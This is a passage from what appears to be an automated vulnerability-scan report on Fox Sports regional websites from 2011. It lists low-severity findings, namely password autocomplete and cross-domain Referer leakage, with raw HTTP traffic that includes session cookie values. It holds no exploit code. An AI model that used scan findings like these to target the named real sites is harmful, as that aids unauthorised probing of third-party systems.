<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

4.19. http://www.foxsportswisconsin.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.foxsportswisconsin.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.foxsportswisconsin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:16 GMT
Server: Apache
Set-Cookie: PHPSESSID=b346a6944b6aa67934f8452ef87105ed; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 74886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

5. Cross-domain Referer leakage  previous  next
There are 6 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


5.1. http://www.foxsportsarizona.com/01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportsarizona.com
Path:   /01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html?blockID=388863&feedID=3698 HTTP/1.1
Host: www.foxsportsarizona.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:39 GMT
Server: Apache
Set-Cookie: PHPSESSID=807fffd592a9bf6fb7d8e7c887d5cf39; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 73519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<link rel="image_src" href="http://www.foxsportsarizona.com/common/medialib/271/285411_thumb.jpg" />
<script language="javascript" src="http://wac.24C5.edgecastcdn.net/8024C5/platform/common/js/jquery-1.4.2.min.js" type="text/javascript" language="javascript1.2"></script>
<link href="http://wac.2532.edgecastcdn.net/802532/foxariz/common/appcss/~1294839306/l=default~landing~menz1192~menz1202~horizontal_tabs_417~horizontal_tabs_622~custom_classes~component_masthead~component_right_generic~component_footer/g=style~fancybox/ucdn=1" rel="stylesheet" type="text/css" />

<!--<script language="javascript">
...[SNIP]...
</script>-->

<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxariz/common/appjs/~1294839306/s=main~thePlatform^swfobject~thePlatform^util~thePlatform^qos~thePlatform^qos_mps~ugc~comment_box/menz=1" type="text/javascript"></script>
...[SNIP]...
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<span class="msnlogo_top"><a href="http://www.msn.com"><img id="msnlogo" src="http://blstc.msn.com/br/gbl/css/10/decoration/logo_sm_msn_rev24.png" title="go to MSN.com" alt="go to MSN.com" /></a>
...[SNIP]...
<li class="c1"><a href="http://entertainment.msn.com/">Entertainment</a>
...[SNIP]...
<li class="first"><a href="http://wonderwall.msn.com/">Celebrities</a>
...[SNIP]...
<li class="new"><a href="http://thebubble.msn.com/ "><strong>
...[SNIP]...
<li><a href="http://entertainment.msn.com/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li><a href="http://zone.msn.com/en-us/home">Games</a></li><li><a href="http://movies.msn.com/">Movies</a></li><li><a href="http://music.msn.com/">Music</a></li><li><a href="http://movies.msn.com/new-on-dvd/movies/">New on DVD</a></li><li><a href="http://tv.msn.com/"> TV</a></li><li><a href="http://entertainment.msn.com/video/?from=en-us_msnhp"> Video</a>
...[SNIP]...
<li class="c2"><a href="http://moneycentral.msn.com/home.asp">Money</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/"><strong>
...[SNIP]...
<li><a href="http://www.msnbc.msn.com/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://moneycentral.msn.com/investor/home.aspx">Investing</a></li><li><a href="http://moneycentral.msn.com/personal-finance/">Personal Finance</a>
...[SNIP]...
<li><a href="http://moneycentral.msn.com/detail/stock_quote">Quotes</a></li><li><a href="http://realestate.msn.com/">Real Estate &amp; Rentals</a>
...[SNIP]...
<li><a href="http://articles.moneycentral.msn.com/video/default.aspx?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c3"><a href="http://lifestyle.msn.com/">Lifestyle</a>
...[SNIP]...
<li class="first"><a href="http://lifestyle.msn.com/your-look/">Beauty &amp; Fashion</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a></li><li><a href="http://lifestyle.msn.com/your-home/">Decor &amp; Organizing</a>
...[SNIP]...
<li><a href="http://glo.msn.com/">Glo</a></li><li><a href="http://health.msn.com/">Health, Diet &amp; Fitness</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?When=0&amp;Af=-1000&amp;VS">Horoscopes</a></li><li><a href="http://lifestyle.msn.com/relationships/">Love &amp; Relationships</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670269"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a></li><li><a href="http://lifestyle.msn.com/your-look/video/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c4 last fluid"><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a></li><li><a href="http://careers.msn.com/">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://my.msn.com/">My MSN</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268"><strong>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://zone.msn.com/en-us/home">Games</a></li><li><a href="http://moneycentral.msn.com/detail/stock_quote">Quotes</a></li><li><a href="http://wonderwall.msn.com/">Wonderwall</a></li><li><a href="http://astrocenter.astrology.msn.com">Horoscopes</a></li><li><a href="http://realestate.msn.com/">Real Estate/Rentals</a>
...[SNIP]...
<li><a href="http://yellowpages.msn.com/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://latino.msn.com/">Latino</a></li><li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a></li><li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=FOXSP">Bing</a></span><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<div class="selected"><a id="sslink" href="http://msn.foxsports.com/search">Search FS Arizona</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the Web</a>
...[SNIP]...
<a href='/pages/main' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxariz/menu_images/7552.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://www.foxsportscarolinas.com' target = '_blank' >FS Carolinas</a>
<a href='http://www.foxsportsdetroit.com' target = '_blank' >FS Detroit</a>
<a href='http://www.foxsportsflorida.com' target = '_blank' >FS Florida</a>
<a href='http://www.foxsportshouston.com' target = '_blank' >FS Houston</a>
<a href='http://www.foxsportskansascity.com' target = '_blank' >FS Kansas City</a>
<a href='http://www.foxsportsmidwest.com' target = '_blank' >FS Midwest</a>
<a href='http://www.foxsportsnorth.com' target = '_blank' >FS North</a>
<a href='http://www.foxsportsohio.com' target = '_blank' >FS Ohio</a>
<a href='http://www.foxsportssouth.com' target = '_blank' >FS South</a>
<a href='http://www.foxsportssouthwest.com' target = '_blank' >FS Southwest</a>
<a href='http://www.foxsportstennessee.com' target = '_blank' >FS Tennessee</a>
<a href='http://www.foxsportswest.com' target = '_blank' >FS West</a>
<a href='http://www.foxsportswisconsin.com' target = '_blank' >FS Wisconsin</a>
<a href='http://www.nesn.com' target = '_blank' >NESN Boston</a>
...[SNIP]...
<a href='/pages/dbacks' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxariz/menu_images/7689.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=schedule' target = '_blank' >Schedule</a>
<a href='http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=roster' target = '_blank' >Roster</a>
<a href='http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=stats' target = '_blank' >Statistics</a>
<a href='http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=profiles' target = '_blank' >Team stats</a>
<a href='http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=injuries' target = '_blank' >Injury report</a>
<a href='http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=trans' target = '_blank' >Transactions</a>
<a href='http://foxsportsarizona.stats.com/mlb/scoreboard.asp' target = '_blank' >Scoreboard</a>
<a href='http://foxsportsarizona.stats.com/mlb/standings.asp' target = '_blank' >Standings</a>
<a href='http://foxsportsarizona.stats.com/mlb/index.asp' target = '_blank' >MLB leaders</a>
...[SNIP]...
<a href='/pages/suns' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxariz/menu_images/7688.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&type=schedule' target = '_blank' >Schedule</a>
<a href='http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&btnGo=Go&type=roster' target = '_blank' >Roster</a>
<a href='http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&btnGo=Go&type=enc' target = '_blank' >Statistics</a>
<a href='http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&btnGo=Go&type=injuries' target = '_blank' >Injury report</a>
<a href='http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&btnGo=Go&type=trans' target = '_blank' >Transactions</a>
<a href='http://foxsportsarizona.stats.com/nba/scoreboard.asp' target = '_blank' >Scoreboard</a>
<a href='http://foxsportsarizona.stats.com/nba/standings.asp' target = '_blank' >Standings</a>
<a href='http://foxsportsarizona.stats.com/nba/index.asp' target = '_blank' >NBA leaders</a>
...[SNIP]...
<a href='/pages/coyotes' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxariz/menu_images/7687.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/nhl/teamstats.asp?teamno=24&type=schedule' target = '_blank' >Schedule</a>
<a href='http://foxsportsarizona.stats.com/nhl/teamstats.asp?teamno=24&type=roster' target = '_blank' >Roster</a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/nhl/teamstats.asp?teamno=24&type=injuries' target = '_blank' >Injury report</a>
<a href='http://foxsportsarizona.stats.com/nhl/scoreboard.asp' target = '_blank' >Scoreboard</a>
<a href='http://foxsportsarizona.stats.com/nhl/standings_conference.asp' target = '_blank' >Standings</a>
<a href='http://foxsportsarizona.stats.com/nhl/index.asp?season=reg' target = '_blank' >NHL leaders</a>
...[SNIP]...
<a href='/pages/sundevils' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxariz/menu_images/7690.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0058&btnGo=Go&report=schedule' target = '_blank' >Football schedule</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0058&btnGo=Go&report=roster' target = '_blank' >Football roster</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0058&btnGo=Go&report=stats' target = '_blank' >Football stats</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0018&btnGo=Go&report=schedule' target = '_blank' >Basketball schedule</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0018&btnGo=Go&report=roster' target = '_blank' >Basketball roster</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0018&btnGo=Go&report=stats' target = '_blank' >Basketball stats</a>
...[SNIP]...
<a href='/pages/azwildcats' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxariz/menu_images/8679.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0057&btnGo=Go&report=schedule' target = '_blank' >Football schedule</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0057&btnGo=Go&report=roster' target = '_blank' >Football roster</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0057&btnGo=Go&report=stats' target = '_blank' >Football stats</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0017&btnGo=Go&report=schedule' target = '_blank' >Basketball schedule</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0017&btnGo=Go&report=roster' target = '_blank' >Basketball roster</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0017&btnGo=Go&report=stats' target = '_blank' >Basketball stats</a>
...[SNIP]...
<a href='/pages/azcardinals' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxariz/menu_images/7692.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/fb/teamstats.asp?teamno=22&type=schedules' target = '_blank' >Schedule</a>
<a href='http://foxsportsarizona.stats.com/fb/teamstats.asp?yr=2010&tm=22&btnGo=Go&type=rosters' target = '_blank' >Roster</a>
<a href='http://foxsportsarizona.stats.com/fb/teamstats.asp?yr=2010&tm=22&btnGo=Go&type=stats' target = '_blank' >Statistics</a>
<a href='http://foxsportsarizona.stats.com/fb/teamstats.asp?yr=2010&tm=22&btnGo=Go&type=injuries' target = '_blank' >Injury report</a>
<a href='http://foxsportsarizona.stats.com/fb/teamstats.asp?yr=2010&tm=22&btnGo=Go&type=transactions' target = '_blank' >Transactions</a>
<a href='http://foxsportsarizona.stats.com/fb/scoreboard.asp' target = '_blank' >Scoreboard</a>
<a href='http://foxsportsarizona.stats.com/fb/totalstandings.asp' target = '_blank' >Standings</a>
<a href='http://foxsportsarizona.stats.com/fb/index.asp' target = '_blank' >NFL stats</a>
...[SNIP]...
<a href='/pages/mercury' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxariz/menu_images/7693.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/wnba/schedules.asp?team=06' target = '_blank' >Schedule</a>
<a href='http://foxsportsarizona.stats.com/wnba/rosters.asp?team=06' target = '_blank' >Roster</a>
<a href='http://foxsportsarizona.stats.com/wnba/stats.asp?team=06' target = '_blank' >Statistics</a>
<a href='http://foxsportsarizona.stats.com/wnba/transinj.asp?team=06&type=trans' target = '_blank' >Transactions</a>
<a href='http://foxsportsarizona.stats.com/wnba/scoreboard.asp' target = '_blank' >Scoreboard</a>
<a href='http://foxsportsarizona.stats.com/wnba/standings.asp' target = '_blank' >Standings</a>
<a href='http://foxsportsarizona.stats.com/wnba/leaders.asp' target = '_blank' >WNBA stats</a>
...[SNIP]...
<a href='/pages/nau' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxariz/menu_images/7696.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0118&btnGo=Go&report=schedule' target = '_blank' >Football schedule</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0118&btnGo=Go&report=roster' target = '_blank' >Football roster</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0118&btnGo=Go&report=stats' target = '_blank' >Football stats</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0420&btnGo=Go&report=stats' target = '_blank' >Basketball stats</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0420&btnGo=Go&report=schedule' target = '_blank' >Basketball schedule</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0420&btnGo=Go&report=roster' target = '_blank' >Basketball roster</a>
...[SNIP]...
<a href='/pages/nmsu' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxariz/menu_images/14741.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0041&btnGo=Go&report=schedule' target = '_blank' >Football schedule</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0041&btnGo=Go&report=roster' target = '_blank' >Football roster</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0041&btnGo=Go&report=stats' target = '_blank' >Football stats</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0405&btnGo=Go&report=schedule' target = '_blank' >Basketball schedule</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0405&btnGo=Go&report=roster' target = '_blank' >Basketball roster</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0405&btnGo=Go&report=stats' target = '_blank' >Basketball stats</a>
...[SNIP]...
<a href='/pages/arizona_pac10' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxariz/menu_images/14740.jpg border=0></a>
<a href='/pages/select/0' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxariz/menu_images/14743.jpg border=0></a>
...[SNIP]...
<a href="/pages/main"><img src="http://wac.2532.edgecastcdn.net/802532/foxariz/navtrans1.gif" alt="" alignment="none" border="0" hspace="" vspace=""></a>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=728x90;ord=1294849814?" type="text/javascript">
</script>
<noscript><a href="http://ad.doubleclick.net/jump/rsn.arizona/landing;tile=3;sz=728x90;ord=1294849814?" target="_self"><img src="http://ad.doubleclick.net/ad/rsn.arizona/landing;tile=3;sz=728x90;ord=1294849814?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' border=0> <a href="#cmnta_388863">
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/email.png' border=0> <a href="javascript:void(0);popup('/pages/email_landing?share_url=/01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html?blockID=388863^feedID=3698^',300,500);" rel="nofollow">
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/print.png' border=0> <a href="/pages/print_landing?blockID=388863&feedID=3698&" target=_blank rel="nofollow">
...[SNIP]...
harer.php?u=' + encodeURIComponent(document.location) + '&t=' + encodeURIComponent('Freshman Dyer runs his way into Auburn lore') ,'sharer','toolbar=0,status=0,width=626,height=436'));" rel="nofollow"><img src='http://platformic-common.s3.amazonaws.com/global_images/icons/facebook.png' height=16 width=16 border=0 onMouseOver="codeHint(1,'Share on Facebook');" onMouseOut="codeHint(-1);" > Facebook</a>
...[SNIP]...
</div>

<a href="http://twitter.com/share" class="twitter-share-button" data-count="none">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<a href="http://www.foxsportsarizona.com/common/dynrss/dynrss_3698_landing_.rss" rel="nofollow"><img src='http://platformic-common.s3.amazonaws.com/global_images/icons/feed.png' height=16 width=16 border=0 ></a>
...[SNIP]...
<strong><a href="http://msn.foxsports.com/collegefootball/gameTrax?gameId=201101100075" target="_blank">GameTrax: Stats and more</a>
...[SNIP]...
<div><img src="http://wac.2532.edgecastcdn.net/802532/foxariz/common/medialib/271/351732.jpg" alt="TuneIn_ASU_011211.jpg" alignment="none" border="0" vspace="" hspace=""></div>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=300x250;ord=1294849814?" type="text/javascript">
</script>
<noscript><a href="http://ad.doubleclick.net/jump/rsn.arizona/landing;tile=3;sz=300x250;ord=1294849814?" target="_self"><img src="http://ad.doubleclick.net/ad/rsn.arizona/landing;tile=3;sz=300x250;ord=1294849814?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
<a href='/common/ad_count.php?segmentID=8645' target='_blank'><IMG SRC='http://wac.2532.edgecastcdn.net/802532/foxariz/common/ad_media/274/adserver_4735.gif' width='88' height='31' border=0></a>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(2)</span> <span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(3)</span>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/miami-heat-cleveland-cavaliers-lebron-james-tweets-insult-to-former-team-011111
" target='_blank'>
LeBron rips Cavs via Twitter
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/page/heat-or-threepeat
" target='_blank'>
Heat or 3Peat
</a>
...[SNIP]...
<li><a href="http://www.foxsportswest.com/01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html?blockID=389566&feedID=3709
" target='_blank'>
Lakers crush Cavs in historic fashion
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/Los-Angeles-Lakers-Kobe-Bryant-blast-Cleveland-Cavaliers-by-55-for-fifth-straight-win-011111
" target='_blank'>
Lakers hand Cavs 11th straight loss
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Michigan-names-Brady-Hoke-next-head-football-coach-011111
" target='_blank'>
Michigan hires Hoke as football coach
</a>
...[SNIP]...
<li><a href="http://www.foxsportsdetroit.com/01/11/11/Hoke-who/landing.html?blockID=389355&feedID=3701
" target='_blank'>
FOX Sports Detroit: Why Brady Hoke?
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/page/nfl-weekly-review-2010
" target='_blank'>
Redirect NFL Weekly Preview
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/story/NFL-playoff-picture-scenarios-2010
" target='_blank'>
NFL playoff schedule
</a>
...[SNIP]...
<a href="http://www.foxsportsarizona.com/10/11/10/FOX-Sports-Arizona-wins-an-all-time-high/landing.html?blockID=329395&amp;feedID=4869"><img src="http://wac.2532.edgecastcdn.net/802532/foxariz/common/medialib/271/284501.jpg" alt="EmmyWinners.jpg" alignment="none" vspace="" border="0" hspace=""></a><br><br><div><a href="javascript:void(window.open('/pages/arizona_theweighin'));"><img src="http://wac.2532.edgecastcdn.net/802532/foxariz/common/medialib/271/221450.jpg" alt="weighinsmallsliver.jpg" alignment="none" vspace="" border="0" hspace=""></a>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(8)</span>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(2)</span> <span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(3)</span>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(5)</span> <span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(2)</span>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(2)</span> <span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(2)</span>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(2)</span> <span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(1)</span>
...[SNIP]...
<a href="javascript:void(window.open('/pages/arizona_communityspotlight'));"><img src="http://wac.2532.edgecastcdn.net/802532/foxariz/common/medialib/271/203604.jpg" alt="CommSpotlightsliver.jpg" alignment="texttop" vspace="" border="0" hspace=""></a>
...[SNIP]...
<a href="javascript:void(window.open('http://foxsportsarizona.wordpress.com/'));"><img src="http://wac.2532.edgecastcdn.net/802532/foxariz/common/medialib/271/195801.jpg" alt="blogsliver.jpg" alignment="none" hspace="" vspace="" border="0"></a>
...[SNIP]...
<br>

<a href="http://www.foxsportscarolinas.com"

target="_blank">
FOX Sports Carolinas</a><br>

<a href="http://www.foxsportsdetroit.com"

target="_blank">
FOX Sports Detroit</a><br>

<a href="http://www.foxsportsflorida.com"

target="_blank">
FOX Sports Florida</a><br>

<a href="http://www.foxsportshouston.com"

target="_blank">
FOX Sports Houston</a><br>

<a href="http://www.foxsportskansascity.com"

target="_blank">
FOX Sports Kansas City</a><br>

<a href="http://www.foxsportsmidwest.com"

target="_blank">
FOX Sports Midwest</a><br>
<a

href="http://www.foxsportsnorth.com"

target="_blank">
FOX Sports North</a>
...[SNIP]...
<td align="left" valign"top"><a href="http://www.foxsportsohio.com"

target="_blank">
FOX Sports Ohio</a><br>

<a href="http://www.foxsportssouth.com"

target="_blank">
FOX Sports South</a><br>

<a href="http://www.foxsportssouthwest.com"

target="_blank">
FOX Sports Southwest</a><br>

<a href="http://www.foxsportstennessee.com"

target="_blank">
FOX Sports Tennessee</a><br>

<a href="http://www.foxsportswest.com"

target="_blank">
FOX Sports West</a><br>

<a href="http://www.foxsportswisconsin.com"

target="_blank">
FOX Sports

Wisconsin</a><br>
<a href="http://www.nesn.com"

target="_blank">
NESN Boston</a>
...[SNIP]...
</a> | <a target="_blank" href="http://www.razorgator.com/tickets/sports/" onclick="this.href=this.href+'?c=79-0-0-0-0-0-0&amp;pid=foxsports'">Tickets</a>
...[SNIP]...
